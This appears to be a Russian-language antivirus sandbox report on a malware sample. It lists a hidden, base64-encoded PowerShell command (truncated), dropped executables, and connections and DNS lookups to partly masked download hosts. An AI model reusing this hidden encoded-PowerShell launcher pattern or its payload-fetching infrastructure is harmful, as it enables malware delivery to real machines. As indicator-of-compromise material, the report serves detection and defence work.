Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABYAHQAdABuAGcAYQBsAGIAeABrAGYAPQAnAEoAYQBjAHEAZgBvAHgAYwB5AHcAeAAnADsAJABEAHYAcgBtAHoAegBpAG0AcAAgAD0AIAAnADcAOAA0ACcAOwAkAEMAdwBsAHEAeQBmAG0AcAB0AHYAdQB6AD0AJwBEAGgAdQB5AHEAYgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1398533.cvr
- %HOMEPATH%\784.exe
- 'en####er.emilee.jp':443
- 'de####odgrains.com':80
- 'de####odgrains.com':443
- 's9.#l6.us':80
- 'de#######ela.webcindario.com':80
- http://de####odgrains.com/bhdz/f6bnbu-p5mk50-933/
- http://de#######ela.webcindario.com/wp-admin/PXstiz/
- 'en####er.emilee.jp':443
- 'de####odgrains.com':443
- DNS ASK en####er.emilee.jp
- DNS ASK de####odgrains.com
- DNS ASK s9.#l6.us
- DNS ASK pl###gicals.com
- DNS ASK de#######ela.webcindario.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABYAHQAdABuAGcAYQBsAGIAeABrAGYAPQAnAEoAYQBjAHEAZgBvAHgAYwB5AHcAeAAnADsAJABEAHYAcgBtAHoAegBpAG0AcAAgAD0AIAAnADcAOAA0ACcAOwAkAEMAdwBsAHEAeQBmAG0AcAB0AHYAdQB6AD0AJwBEAGgAdQB5AHEAYgB...' (со скрытым окном)